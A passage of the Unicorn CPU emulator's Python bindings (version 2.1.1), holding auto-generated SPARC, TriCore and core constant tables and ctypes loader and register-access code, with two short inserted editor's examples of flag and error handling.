16 UC_CPU_SPARC64_ENDING = 17
# SPARC registers
UC_SPARC_REG_INVALID = 0 UC_SPARC_REG_F0 = 1 UC_SPARC_REG_F1 = 2 UC_SPARC_REG_F2 = 3 UC_SPARC_REG_F3 = 4 UC_SPARC_REG_F4 = 5 UC_SPARC_REG_F5 = 6 UC_SPARC_REG_F6 = 7 UC_SPARC_REG_F7 = 8 UC_SPARC_REG_F8 = 9 UC_SPARC_REG_F9 = 10 UC_SPARC_REG_F10 = 11 UC_SPARC_REG_F11 = 12 UC_SPARC_REG_F12 = 13 UC_SPARC_REG_F13 = 14 UC_SPARC_REG_F14 = 15 UC_SPARC_REG_F15 = 16 UC_SPARC_REG_F16 = 17 UC_SPARC_REG_F17 = 18 UC_SPARC_REG_F18 = 19 UC_SPARC_REG_F19 = 20 UC_SPARC_REG_F20 = 21 UC_SPARC_REG_F21 = 22 UC_SPARC_REG_F22 = 23 UC_SPARC_REG_F23 = 24 UC_SPARC_REG_F24 = 25 UC_SPARC_REG_F25 = 26 UC_SPARC_REG_F26 = 27 UC_SPARC_REG_F27 = 28 UC_SPARC_REG_F28 = 29 UC_SPARC_REG_F29 = 30 UC_SPARC_REG_F30 = 31 UC_SPARC_REG_F31 = 32 UC_SPARC_REG_F32 = 33 UC_SPARC_REG_F34 = 34 UC_SPARC_REG_F36 = 35 UC_SPARC_REG_F38 = 36 UC_SPARC_REG_F40 = 37 UC_SPARC_REG_F42 = 38 UC_SPARC_REG_F44 = 39 UC_SPARC_REG_F46 = 40 UC_SPARC_REG_F48 = 41 UC_SPARC_REG_F50 = 42 UC_SPARC_REG_F52 = 43 UC_SPARC_REG_F54 = 44 UC_SPARC_REG_F56 = 45 UC_SPARC_REG_F58 = 46 UC_SPARC_REG_F60 = 47 UC_SPARC_REG_F62 = 48 UC_SPARC_REG_FCC0 = 49 UC_SPARC_REG_FCC1 = 50 UC_SPARC_REG_FCC2 = 51 UC_SPARC_REG_FCC3 = 52 UC_SPARC_REG_G0 = 53 UC_SPARC_REG_G1 = 54 UC_SPARC_REG_G2 = 55 UC_SPARC_REG_G3 = 56 UC_SPARC_REG_G4 = 57 UC_SPARC_REG_G5 = 58 UC_SPARC_REG_G6 = 59 UC_SPARC_REG_G7 = 60
UC_SPARC_REG_I0 = 61 UC_SPARC_REG_I1 = 62 UC_SPARC_REG_I2 = 63 UC_SPARC_REG_I3 = 64 UC_SPARC_REG_I4 = 65 UC_SPARC_REG_I5 = 66 UC_SPARC_REG_FP = 67 UC_SPARC_REG_I7 = 68 UC_SPARC_REG_ICC = 69 UC_SPARC_REG_L0 = 70 UC_SPARC_REG_L1 = 71 UC_SPARC_REG_L2 = 72 UC_SPARC_REG_L3 = 73 UC_SPARC_REG_L4 = 74 UC_SPARC_REG_L5 = 75 UC_SPARC_REG_L6 = 76 UC_SPARC_REG_L7 = 77 UC_SPARC_REG_O0 = 78 UC_SPARC_REG_O1 = 79 UC_SPARC_REG_O2 = 80 UC_SPARC_REG_O3 = 81 UC_SPARC_REG_O4 = 82 UC_SPARC_REG_O5 = 83 UC_SPARC_REG_SP = 84 UC_SPARC_REG_O7 = 85 UC_SPARC_REG_Y = 86 UC_SPARC_REG_XCC = 87 UC_SPARC_REG_PC = 88 UC_SPARC_REG_ENDING = 89 UC_SPARC_REG_O6 = 84 UC_SPARC_REG_I6 = 67

unicorn-2.1.1/bindings/python/unicorn/tricore_const.py

# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [tricore_const.py]

# TRICORE CPU
UC_CPU_TRICORE_TC1796 = 0 UC_CPU_TRICORE_TC1797 = 1 UC_CPU_TRICORE_TC27X = 2 UC_CPU_TRICORE_ENDING = 3
# TRICORE registers
UC_TRICORE_REG_INVALID = 0 UC_TRICORE_REG_A0 = 1 UC_TRICORE_REG_A1 = 2 UC_TRICORE_REG_A2 = 3 UC_TRICORE_REG_A3 = 4 UC_TRICORE_REG_A4 = 5 UC_TRICORE_REG_A5 = 6 UC_TRICORE_REG_A6 = 7 UC_TRICORE_REG_A7 = 8 UC_TRICORE_REG_A8 = 9 UC_TRICORE_REG_A9 = 10 UC_TRICORE_REG_A10 = 11 UC_TRICORE_REG_A11 = 12 UC_TRICORE_REG_A12 = 13 UC_TRICORE_REG_A13 = 14 UC_TRICORE_REG_A14 = 15 UC_TRICORE_REG_A15 = 16 UC_TRICORE_REG_D0 = 17 UC_TRICORE_REG_D1 = 18 UC_TRICORE_REG_D2 = 19 UC_TRICORE_REG_D3 = 20 UC_TRICORE_REG_D4 = 21 UC_TRICORE_REG_D5 = 22 UC_TRICORE_REG_D6 = 23 UC_TRICORE_REG_D7 = 24 UC_TRICORE_REG_D8 = 25 UC_TRICORE_REG_D9 = 26 UC_TRICORE_REG_D10 = 27 UC_TRICORE_REG_D11 = 28 UC_TRICORE_REG_D12 = 29 UC_TRICORE_REG_D13 = 30 UC_TRICORE_REG_D14 = 31 UC_TRICORE_REG_D15 = 32 UC_TRICORE_REG_PCXI = 33 UC_TRICORE_REG_PSW = 34 UC_TRICORE_REG_PSW_USB_C = 35 UC_TRICORE_REG_PSW_USB_V = 36 UC_TRICORE_REG_PSW_USB_SV = 37 UC_TRICORE_REG_PSW_USB_AV = 38 UC_TRICORE_REG_PSW_USB_SAV = 39 UC_TRICORE_REG_PC = 40 UC_TRICORE_REG_SYSCON = 41 UC_TRICORE_REG_CPU_ID = 42 UC_TRICORE_REG_BIV = 43 UC_TRICORE_REG_BTV = 44 UC_TRICORE_REG_ISP = 45 UC_TRICORE_REG_ICR = 46 UC_TRICORE_REG_FCX = 47 UC_TRICORE_REG_LCX = 48 UC_TRICORE_REG_COMPAT = 49 UC_TRICORE_REG_DPR0_U = 50 UC_TRICORE_REG_DPR1_U = 51 UC_TRICORE_REG_DPR2_U = 52 UC_TRICORE_REG_DPR3_U = 53 UC_TRICORE_REG_DPR0_L = 54 UC_TRICORE_REG_DPR1_L = 55 UC_TRICORE_REG_DPR2_L = 56 UC_TRICORE_REG_DPR3_L = 57 UC_TRICORE_REG_CPR0_U = 58 UC_TRICORE_REG_CPR1_U = 59 UC_TRICORE_REG_CPR2_U = 60 UC_TRICORE_REG_CPR3_U = 61 UC_TRICORE_REG_CPR0_L = 62 UC_TRICORE_REG_CPR1_L = 63 UC_TRICORE_REG_CPR2_L = 64 UC_TRICORE_REG_CPR3_L = 65 UC_TRICORE_REG_DPM0 = 66 UC_TRICORE_REG_DPM1 = 67 UC_TRICORE_REG_DPM2 = 68 UC_TRICORE_REG_DPM3 = 69 UC_TRICORE_REG_CPM0 = 70 UC_TRICORE_REG_CPM1 = 71
UC_TRICORE_REG_CPM2 = 72 UC_TRICORE_REG_CPM3 = 73 UC_TRICORE_REG_MMU_CON = 74 UC_TRICORE_REG_MMU_ASI = 75 UC_TRICORE_REG_MMU_TVA = 76 UC_TRICORE_REG_MMU_TPA = 77 UC_TRICORE_REG_MMU_TPX = 78 UC_TRICORE_REG_MMU_TFA = 79 UC_TRICORE_REG_BMACON = 80 UC_TRICORE_REG_SMACON = 81 UC_TRICORE_REG_DIEAR = 82 UC_TRICORE_REG_DIETR = 83 UC_TRICORE_REG_CCDIER = 84 UC_TRICORE_REG_MIECON = 85 UC_TRICORE_REG_PIEAR = 86 UC_TRICORE_REG_PIETR = 87 UC_TRICORE_REG_CCPIER = 88 UC_TRICORE_REG_DBGSR = 89 UC_TRICORE_REG_EXEVT = 90 UC_TRICORE_REG_CREVT = 91 UC_TRICORE_REG_SWEVT = 92 UC_TRICORE_REG_TR0EVT = 93 UC_TRICORE_REG_TR1EVT = 94 UC_TRICORE_REG_DMS = 95 UC_TRICORE_REG_DCX = 96 UC_TRICORE_REG_DBGTCR = 97 UC_TRICORE_REG_CCTRL = 98 UC_TRICORE_REG_CCNT = 99 UC_TRICORE_REG_ICNT = 100 UC_TRICORE_REG_M1CNT = 101 UC_TRICORE_REG_M2CNT = 102 UC_TRICORE_REG_M3CNT = 103 UC_TRICORE_REG_ENDING = 104
UC_TRICORE_REG_GA0 = 1 UC_TRICORE_REG_GA1 = 2 UC_TRICORE_REG_GA8 = 9 UC_TRICORE_REG_GA9 = 10 UC_TRICORE_REG_SP = 11 UC_TRICORE_REG_LR = 12 UC_TRICORE_REG_IA = 16 UC_TRICORE_REG_ID = 32

unicorn-2.1.1/bindings/python/unicorn/unicorn.py

import sys as _sys

from .unicorn_const import (
    UC_VERSION_MAJOR as __MAJOR,
    UC_VERSION_MINOR as __MINOR,
    UC_VERSION_PATCH as __PATCH
)

__version__ = "%u.%u.%u" % (__MAJOR, __MINOR, __PATCH)

if _sys.version_info.major == 2:
    from .unicorn_py2 import *
else:
    from .unicorn_py3 import *

unicorn-2.1.1/bindings/python/unicorn/unicorn_const.py

# For Unicorn Engine.
AUTO-GENERATED FILE, DO NOT EDIT [unicorn_const.py] UC_API_MAJOR = 2 UC_API_MINOR = 1 UC_API_PATCH = 0 UC_API_EXTRA = 255 UC_VERSION_MAJOR = 2 UC_VERSION_MINOR = 1 UC_VERSION_PATCH = 0 UC_VERSION_EXTRA = 255 UC_SECOND_SCALE = 1000000 UC_MILISECOND_SCALE = 1000 UC_ARCH_ARM = 1 UC_ARCH_ARM64 = 2 UC_ARCH_MIPS = 3 UC_ARCH_X86 = 4 UC_ARCH_PPC = 5 UC_ARCH_SPARC = 6 UC_ARCH_M68K = 7 UC_ARCH_RISCV = 8 UC_ARCH_S390X = 9 UC_ARCH_TRICORE = 10 UC_ARCH_MAX = 11 UC_MODE_LITTLE_ENDIAN = 0 UC_MODE_BIG_ENDIAN = 1073741824 UC_MODE_ARM = 0 UC_MODE_THUMB = 16 UC_MODE_MCLASS = 32 UC_MODE_V8 = 64 UC_MODE_ARMBE8 = 1024 UC_MODE_ARM926 = 128 UC_MODE_ARM946 = 256 UC_MODE_ARM1176 = 512 UC_MODE_MICRO = 16 UC_MODE_MIPS3 = 32 UC_MODE_MIPS32R6 = 64 UC_MODE_MIPS32 = 4 UC_MODE_MIPS64 = 8 UC_MODE_16 = 2 UC_MODE_32 = 4 UC_MODE_64 = 8 UC_MODE_PPC32 = 4 UC_MODE_PPC64 = 8 UC_MODE_QPX = 16 UC_MODE_SPARC32 = 4 UC_MODE_SPARC64 = 8 UC_MODE_V9 = 16 UC_MODE_RISCV32 = 4 UC_MODE_RISCV64 = 8 UC_ERR_OK = 0 UC_ERR_NOMEM = 1 UC_ERR_ARCH = 2 UC_ERR_HANDLE = 3 UC_ERR_MODE = 4 UC_ERR_VERSION = 5 UC_ERR_READ_UNMAPPED = 6 UC_ERR_WRITE_UNMAPPED = 7 UC_ERR_FETCH_UNMAPPED = 8 UC_ERR_HOOK = 9 UC_ERR_INSN_INVALID = 10 UC_ERR_MAP = 11 UC_ERR_WRITE_PROT = 12 UC_ERR_READ_PROT = 13 UC_ERR_FETCH_PROT = 14 UC_ERR_ARG = 15 UC_ERR_READ_UNALIGNED = 16 UC_ERR_WRITE_UNALIGNED = 17 UC_ERR_FETCH_UNALIGNED = 18 UC_ERR_HOOK_EXIST = 19 UC_ERR_RESOURCE = 20 UC_ERR_EXCEPTION = 21 UC_ERR_OVERFLOW = 22 UC_MEM_READ = 16 UC_MEM_WRITE = 17 UC_MEM_FETCH = 18 UC_MEM_READ_UNMAPPED = 19 UC_MEM_WRITE_UNMAPPED = 20 UC_MEM_FETCH_UNMAPPED = 21 UC_MEM_WRITE_PROT = 22 UC_MEM_READ_PROT = 23 UC_MEM_FETCH_PROT = 24 UC_MEM_READ_AFTER = 25 UC_TCG_OP_SUB = 0 UC_TCG_OP_FLAG_CMP = 1 UC_TCG_OP_FLAG_DIRECT = 2 UC_HOOK_INTR = 1 UC_HOOK_INSN = 2 UC_HOOK_CODE = 4 UC_HOOK_BLOCK = 8 UC_HOOK_MEM_READ_UNMAPPED = 16 UC_HOOK_MEM_WRITE_UNMAPPED = 32 UC_HOOK_MEM_FETCH_UNMAPPED = 64 UC_HOOK_MEM_READ_PROT = 128 UC_HOOK_MEM_WRITE_PROT = 256 UC_HOOK_MEM_FETCH_PROT = 512 UC_HOOK_MEM_READ = 1024 UC_HOOK_MEM_WRITE = 2048 UC_HOOK_MEM_FETCH = 4096 UC_HOOK_MEM_READ_AFTER = 8192 UC_HOOK_INSN_INVALID = 16384 UC_HOOK_EDGE_GENERATED = 32768 UC_HOOK_TCG_OPCODE = 65536 UC_HOOK_TLB_FILL = 131072 UC_HOOK_MEM_UNMAPPED = 112 UC_HOOK_MEM_PROT = 896 UC_HOOK_MEM_READ_INVALID = 144 UC_HOOK_MEM_WRITE_INVALID = 288 UC_HOOK_MEM_FETCH_INVALID = 576 UC_HOOK_MEM_INVALID = 1008 UC_HOOK_MEM_VALID = 7168 UC_QUERY_MODE = 1 UC_QUERY_PAGE_SIZE = 2 UC_QUERY_ARCH = 3 UC_QUERY_TIMEOUT = 4 UC_CTL_IO_NONE = 0 UC_CTL_IO_WRITE = 1 UC_CTL_IO_READ = 2 UC_CTL_IO_READ_WRITE = 3 UC_TLB_CPU = 0 UC_TLB_VIRTUAL = 1 UC_CTL_UC_MODE = 0 UC_CTL_UC_PAGE_SIZE = 1 UC_CTL_UC_ARCH = 2 UC_CTL_UC_TIMEOUT = 3 UC_CTL_UC_USE_EXITS = 4 UC_CTL_UC_EXITS_CNT = 5 UC_CTL_UC_EXITS = 6 UC_CTL_CPU_MODEL = 7 UC_CTL_TB_REQUEST_CACHE = 8 UC_CTL_TB_REMOVE_CACHE = 9 UC_CTL_TB_FLUSH = 10 UC_CTL_TLB_FLUSH = 11 UC_CTL_TLB_TYPE = 12 UC_CTL_TCG_BUFFER_SIZE = 13 UC_CTL_CONTEXT_MODE = 14 UC_PROT_NONE = 0 UC_PROT_READ = 1 UC_PROT_WRITE = 2 UC_PROT_EXEC = 4 UC_PROT_ALL = 7 UC_CTL_CONTEXT_CPU = 1 UC_CTL_CONTEXT_MEMORY = 2 
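
[Editor's illustration, not part of the generated file: the UC_HOOK_* and UC_PROT_* values above are bit flags meant to be OR-ed together, and the aggregate constants such as UC_HOOK_MEM_UNMAPPED and UC_PROT_ALL are simply pre-composed masks.]

    from unicorn.unicorn_const import (
        UC_HOOK_MEM_READ_UNMAPPED, UC_HOOK_MEM_WRITE_UNMAPPED,
        UC_HOOK_MEM_FETCH_UNMAPPED, UC_HOOK_MEM_UNMAPPED,
        UC_PROT_READ, UC_PROT_WRITE, UC_PROT_EXEC, UC_PROT_ALL,
    )

    # 16 | 32 | 64 == 112
    assert (UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED |
            UC_HOOK_MEM_FETCH_UNMAPPED) == UC_HOOK_MEM_UNMAPPED
    # 1 | 2 | 4 == 7
    assert (UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC) == UC_PROT_ALL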
unicorn-2.1.1/bindings/python/unicorn/unicorn_py2.py

# Unicorn Python bindings, by Nguyen Anh Quynnh <aquynh@gmail.com>
import ctypes
import ctypes.util
import distutils.sysconfig
from functools import wraps
import pkg_resources
import inspect
import os.path
import sys
import weakref
import functools

from collections import namedtuple

# We can't place this file in a separate folder due to Python2 limitations but
# anyway we just maintain it with minimum efforts and it has been more than 3
# years since EOL of Python2 so it should be fine.
from . import x86_const, arm_const, arm64_const, unicorn_const as uc

# Compatibility placeholder, nothing special here
ucsubclass = 0

if not hasattr(sys.modules[__name__], "__file__"):
    __file__ = inspect.getfile(inspect.currentframe())

_python2 = sys.version_info[0] < 3
if _python2:
    range = xrange

_lib = {
    'darwin': 'libunicorn.2.dylib',
    'win32': 'unicorn.dll',
    'cygwin': 'cygunicorn.dll',
    'linux': 'libunicorn.so.2',
    'linux2': 'libunicorn.so.2'
}

# Windows DLL in dependency order
_all_windows_dlls = (
    "libwinpthread-1.dll",
    "libgcc_s_seh-1.dll",
    "libgcc_s_dw2-1.dll",
)

_loaded_windows_dlls = set()


def _load_win_support(path):
    for dll in _all_windows_dlls:
        if dll in _loaded_windows_dlls:
            continue

        lib_file = os.path.join(path, dll)
        if ('/' not in path and '\\' not in path) or os.path.exists(lib_file):
            try:
                #print('Trying to load Windows library', lib_file)
                ctypes.cdll.LoadLibrary(lib_file)
                #print('SUCCESS')
                _loaded_windows_dlls.add(dll)
            except OSError as e:
                #print('FAIL to load %s' %lib_file, e)
                continue


# Initial attempt: load all dlls globally
if sys.platform in ('win32', 'cygwin'):
    _load_win_support('')


def _load_lib(path):
    try:
        if sys.platform in ('win32', 'cygwin'):
            _load_win_support(path)

        lib_file = os.path.join(path, _lib.get(sys.platform, 'libunicorn.so.2'))
        dll = ctypes.cdll.LoadLibrary(lib_file)
        #print('SUCCESS')
        return dll
    except OSError as e:
        #print('FAIL to load %s' %lib_file, e)
        return None


_uc = None

# Loading attempts, in order
# - user-provided environment variable
# - pkg_resources can get us the path to the local libraries
# - we can get the path to the local libraries by parsing our filename
# - global load
# - python's lib directory
# - last-gasp attempt at some hardcoded paths on darwin and linux
_path_list = [os.getenv('LIBUNICORN_PATH', None),
              pkg_resources.resource_filename(__name__, 'lib'),
              os.path.join(os.path.split(__file__)[0], 'lib'),
              '',
              distutils.sysconfig.get_python_lib(),
              "/usr/local/lib/" if sys.platform == 'darwin' else '/usr/lib64',
              os.getenv('PATH', '')]

# print(_path_list)
# print("-" * 80)
for _path in _path_list:
    if _path is None:
        continue
    _uc = _load_lib(_path)
    if _uc is not None:
        break
else:
    raise ImportError("ERROR: fail to load the dynamic library.")

# __version__ = "%u.%u.%u" % (uc.UC_VERSION_MAJOR, uc.UC_VERSION_MINOR, uc.UC_VERSION_EXTRA)


# setup all the function prototypes
def _setup_prototype(lib, fname, restype, *argtypes):
    try:
        getattr(lib, fname).restype = restype
        getattr(lib, fname).argtypes = argtypes
    except AttributeError:
        raise ImportError("ERROR: Fail to setup some function prototypes. Make sure you have cleaned your unicorn1 installation.")


ucerr = ctypes.c_int
uc_mode = ctypes.c_int
uc_arch = ctypes.c_int
uc_engine = ctypes.c_void_p
uc_context = ctypes.c_void_p
uc_hook_h = ctypes.c_size_t


class _uc_mem_region(ctypes.Structure):
    _fields_ = [
        ("begin", ctypes.c_uint64),
        ("end", ctypes.c_uint64),
        ("perms", ctypes.c_uint32),
    ]


class uc_tb(ctypes.Structure):
    """TranslationBlock"""
    _fields_ = [
        ("pc", ctypes.c_uint64),
        ("icount", ctypes.c_uint16),
        ("size", ctypes.c_uint16)
    ]


_setup_prototype(_uc, "uc_version", ctypes.c_uint, ctypes.POINTER(ctypes.c_int), ctypes.POINTER(ctypes.c_int))
_setup_prototype(_uc, "uc_arch_supported", ctypes.c_bool, ctypes.c_int)
_setup_prototype(_uc, "uc_open", ucerr, ctypes.c_uint, ctypes.c_uint, ctypes.POINTER(uc_engine))
_setup_prototype(_uc, "uc_close", ucerr, uc_engine)
_setup_prototype(_uc, "uc_strerror", ctypes.c_char_p, ucerr)
_setup_prototype(_uc, "uc_errno", ucerr, uc_engine)
_setup_prototype(_uc, "uc_reg_read", ucerr, uc_engine, ctypes.c_int, ctypes.c_void_p)
_setup_prototype(_uc, "uc_reg_write", ucerr, uc_engine, ctypes.c_int, ctypes.c_void_p)
_setup_prototype(_uc, "uc_mem_read", ucerr, uc_engine, ctypes.c_uint64, ctypes.POINTER(ctypes.c_char), ctypes.c_size_t)
_setup_prototype(_uc, "uc_mem_write", ucerr, uc_engine, ctypes.c_uint64, ctypes.POINTER(ctypes.c_char), ctypes.c_size_t)
_setup_prototype(_uc, "uc_emu_start", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_size_t)
_setup_prototype(_uc, "uc_emu_stop", ucerr, uc_engine)
_setup_prototype(_uc, "uc_hook_del", ucerr, uc_engine, uc_hook_h)
_setup_prototype(_uc, "uc_mmio_map", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p)
_setup_prototype(_uc, "uc_mem_map", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_uint32)
_setup_prototype(_uc, "uc_mem_map_ptr", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_uint32, ctypes.c_void_p)
_setup_prototype(_uc, "uc_mem_unmap", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_size_t)
_setup_prototype(_uc, "uc_mem_protect", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_uint32)
_setup_prototype(_uc, "uc_query", ucerr, uc_engine, ctypes.c_uint32, ctypes.POINTER(ctypes.c_size_t))
_setup_prototype(_uc, "uc_context_alloc", ucerr, uc_engine, ctypes.POINTER(uc_context))
_setup_prototype(_uc, "uc_free", ucerr, ctypes.c_void_p)
_setup_prototype(_uc, "uc_context_save", ucerr, uc_engine, uc_context)
_setup_prototype(_uc, "uc_context_restore", ucerr, uc_engine, uc_context)
_setup_prototype(_uc, "uc_context_size", ctypes.c_size_t, uc_engine)
_setup_prototype(_uc, "uc_context_reg_read", ucerr, uc_context, ctypes.c_int, ctypes.c_void_p)
_setup_prototype(_uc, "uc_context_reg_write", ucerr, uc_context, ctypes.c_int, ctypes.c_void_p)
_setup_prototype(_uc, "uc_context_free", ucerr, uc_context)
_setup_prototype(_uc, "uc_mem_regions", ucerr, uc_engine, ctypes.POINTER(ctypes.POINTER(_uc_mem_region)), ctypes.POINTER(ctypes.c_uint32))
# https://bugs.python.org/issue42880
_setup_prototype(_uc, "uc_hook_add", ucerr, uc_engine, ctypes.POINTER(uc_hook_h), ctypes.c_int, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_uint64, ctypes.c_uint64)
_setup_prototype(_uc, "uc_ctl", ucerr, uc_engine, ctypes.c_int)

UC_HOOK_CODE_CB = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_void_p)
UC_HOOK_INSN_INVALID_CB = ctypes.CFUNCTYPE(ctypes.c_bool, uc_engine, ctypes.c_void_p)
UC_HOOK_MEM_INVALID_CB = ctypes.CFUNCTYPE(
    ctypes.c_bool, uc_engine, ctypes.c_int,
    ctypes.c_uint64, ctypes.c_int, ctypes.c_int64, ctypes.c_void_p
)
UC_HOOK_MEM_ACCESS_CB = ctypes.CFUNCTYPE(
    None, uc_engine, ctypes.c_int,
    ctypes.c_uint64, ctypes.c_int, ctypes.c_int64, ctypes.c_void_p
)
UC_HOOK_INTR_CB = ctypes.CFUNCTYPE(
    None, uc_engine, ctypes.c_uint32, ctypes.c_void_p
)
UC_HOOK_INSN_IN_CB = ctypes.CFUNCTYPE(
    ctypes.c_uint32, uc_engine, ctypes.c_uint32, ctypes.c_int, ctypes.c_void_p
)
UC_HOOK_INSN_OUT_CB = ctypes.CFUNCTYPE(
    None, uc_engine, ctypes.c_uint32,
    ctypes.c_int, ctypes.c_uint32, ctypes.c_void_p
)
UC_HOOK_INSN_SYSCALL_CB = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_void_p)
UC_HOOK_INSN_SYS_CB = ctypes.CFUNCTYPE(ctypes.c_uint32, uc_engine, ctypes.c_uint32, ctypes.c_void_p, ctypes.c_void_p)
UC_MMIO_READ_CB = ctypes.CFUNCTYPE(
    ctypes.c_uint64, uc_engine, ctypes.c_uint64, ctypes.c_int, ctypes.c_void_p
)
UC_MMIO_WRITE_CB = ctypes.CFUNCTYPE(
    None, uc_engine, ctypes.c_uint64, ctypes.c_int, ctypes.c_uint64, ctypes.c_void_p
)
UC_HOOK_EDGE_GEN_CB = ctypes.CFUNCTYPE(
    None, uc_engine, ctypes.POINTER(uc_tb), ctypes.POINTER(uc_tb), ctypes.c_void_p
)
UC_HOOK_TCG_OPCODE_CB = ctypes.CFUNCTYPE(
    None, uc_engine, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p
)


# access to error code via @errno of UcError
class UcError(Exception):
    def __init__(self, errno):
        self.errno = errno

    def __str__(self):
        return _uc.uc_strerror(self.errno).decode('ascii')


# return the core's version
def uc_version():
    major = ctypes.c_int()
    minor = ctypes.c_int()
    combined = _uc.uc_version(ctypes.byref(major), ctypes.byref(minor))
    return (major.value, minor.value, combined)


# return the binding's version
def version_bind():
    return (
        uc.UC_API_MAJOR, uc.UC_API_MINOR,
        (uc.UC_API_MAJOR << 8) + uc.UC_API_MINOR,
    )


# check to see if this engine supports a particular arch
def uc_arch_supported(query):
    return _uc.uc_arch_supported(query)
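
# Editor's note: a minimal illustrative sketch, not part of the original file,
# showing how callers typically consume the helpers above: failures surface as
# UcError exceptions whose .errno carries the UC_ERR_* code, and uc_version()
# can be compared against version_bind() to detect core/binding mismatches.

def _error_handling_sketch():
    assert uc_version()[:2] == version_bind()[:2], "core and binding disagree"
    try:
        raise UcError(uc.UC_ERR_ARG)  # stands in for any failing API call
    except UcError as err:
        assert err.errno == uc.UC_ERR_ARG
        print("unicorn error: %s" % err)  # __str__ asks the core via uc_strerror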
# uc_reg_read/write and uc_context_reg_read/write.
def reg_read(reg_read_func, arch, reg_id, opt=None):
    if arch == uc.UC_ARCH_X86:
        if reg_id in [x86_const.UC_X86_REG_IDTR, x86_const.UC_X86_REG_GDTR, x86_const.UC_X86_REG_LDTR, x86_const.UC_X86_REG_TR]:
            reg = uc_x86_mmr()
            status = reg_read_func(reg_id, ctypes.byref(reg))
            if status != uc.UC_ERR_OK:
                raise UcError(status)
            return reg.selector, reg.base, reg.limit, reg.flags
        if reg_id in range(x86_const.UC_X86_REG_FP0, x86_const.UC_X86_REG_FP0+8):
            reg = uc_x86_float80()
            status = reg_read_func(reg_id, ctypes.byref(reg))
            if status != uc.UC_ERR_OK:
                raise UcError(status)
            return reg.mantissa, reg.exponent
        if reg_id in range(x86_const.UC_X86_REG_XMM0, x86_const.UC_X86_REG_XMM0+8):
            reg = uc_x86_xmm()
            status = reg_read_func(reg_id, ctypes.byref(reg))
            if status != uc.UC_ERR_OK:
                raise UcError(status)
            return reg.low_qword | (reg.high_qword << 64)
        if reg_id in range(x86_const.UC_X86_REG_YMM0, x86_const.UC_X86_REG_YMM0+16):
            reg = uc_x86_ymm()
            status = reg_read_func(reg_id, ctypes.byref(reg))
            if status != uc.UC_ERR_OK:
                raise UcError(status)
            return reg.first_qword | (reg.second_qword << 64) | (reg.third_qword << 128) | (reg.fourth_qword << 192)
        if reg_id == x86_const.UC_X86_REG_MSR:
            if opt is None:
                raise UcError(uc.UC_ERR_ARG)
            reg = uc_x86_msr()
            reg.rid = opt
            status = reg_read_func(reg_id, ctypes.byref(reg))
            if status != uc.UC_ERR_OK:
                raise UcError(status)
            return reg.value

    if arch == uc.UC_ARCH_ARM:
        if reg_id == arm_const.UC_ARM_REG_CP_REG:
            reg = uc_arm_cp_reg()
            if not isinstance(opt, tuple) or len(opt) != 7:
                raise UcError(uc.UC_ERR_ARG)
            reg.cp, reg.is64, reg.sec, reg.crn, reg.crm, reg.opc1, reg.opc2 = opt
            status = reg_read_func(reg_id, ctypes.byref(reg))
            if status != uc.UC_ERR_OK:
                raise UcError(status)
            return reg.val

    if arch == uc.UC_ARCH_ARM64:
        if reg_id == arm64_const.UC_ARM64_REG_CP_REG:
            reg = uc_arm64_cp_reg()
            if not isinstance(opt, tuple) or len(opt) != 5:
                raise UcError(uc.UC_ERR_ARG)
            reg.crn, reg.crm, reg.op0, reg.op1, reg.op2 = opt
            status = reg_read_func(reg_id, ctypes.byref(reg))
            if status != uc.UC_ERR_OK:
                raise UcError(status)
            return reg.val
        elif reg_id in range(arm64_const.UC_ARM64_REG_Q0, arm64_const.UC_ARM64_REG_Q31+1) or \
                reg_id in range(arm64_const.UC_ARM64_REG_V0, arm64_const.UC_ARM64_REG_V31+1):
            reg = uc_arm64_neon128()
            status = reg_read_func(reg_id, ctypes.byref(reg))
            if status != uc.UC_ERR_OK:
                raise UcError(status)
            return reg.low_qword | (reg.high_qword << 64)

    # read to 64bit number to be safe
    reg = ctypes.c_uint64(0)
    status = reg_read_func(reg_id, ctypes.byref(reg))
    if status != uc.UC_ERR_OK:
        raise UcError(status)
    return reg.value


def reg_write(reg_write_func, arch, reg_id, value):
    reg = None

    if arch == uc.UC_ARCH_X86:
        if reg_id in [x86_const.UC_X86_REG_IDTR, x86_const.UC_X86_REG_GDTR, x86_const.UC_X86_REG_LDTR, x86_const.UC_X86_REG_TR]:
            assert isinstance(value, tuple) and len(value) == 4
            reg = uc_x86_mmr()
            reg.selector = value[0]
            reg.base = value[1]
            reg.limit = value[2]
            reg.flags = value[3]
        if reg_id in range(x86_const.UC_X86_REG_FP0, x86_const.UC_X86_REG_FP0+8):
            reg = uc_x86_float80()
            reg.mantissa = value[0]
            reg.exponent = value[1]
        if reg_id in range(x86_const.UC_X86_REG_XMM0, x86_const.UC_X86_REG_XMM0+8):
            reg = uc_x86_xmm()
            reg.low_qword = value & 0xffffffffffffffff
            reg.high_qword = value >> 64
        if reg_id in range(x86_const.UC_X86_REG_YMM0, x86_const.UC_X86_REG_YMM0+16):
            reg = uc_x86_ymm()
            reg.first_qword = value & 0xffffffffffffffff
            reg.second_qword = (value >> 64) & 0xffffffffffffffff
            reg.third_qword = (value >> 128) & 0xffffffffffffffff
            reg.fourth_qword = value >> 192
        if reg_id == x86_const.UC_X86_REG_MSR:
            reg = uc_x86_msr()
            reg.rid = value[0]
            reg.value = value[1]

    if arch == uc.UC_ARCH_ARM64:
        if reg_id in range(arm64_const.UC_ARM64_REG_Q0, arm64_const.UC_ARM64_REG_Q31+1) or \
                reg_id in range(arm64_const.UC_ARM64_REG_V0, arm64_const.UC_ARM64_REG_V31+1):
            reg = uc_arm64_neon128()
            reg.low_qword = value & 0xffffffffffffffff
            reg.high_qword = value >> 64

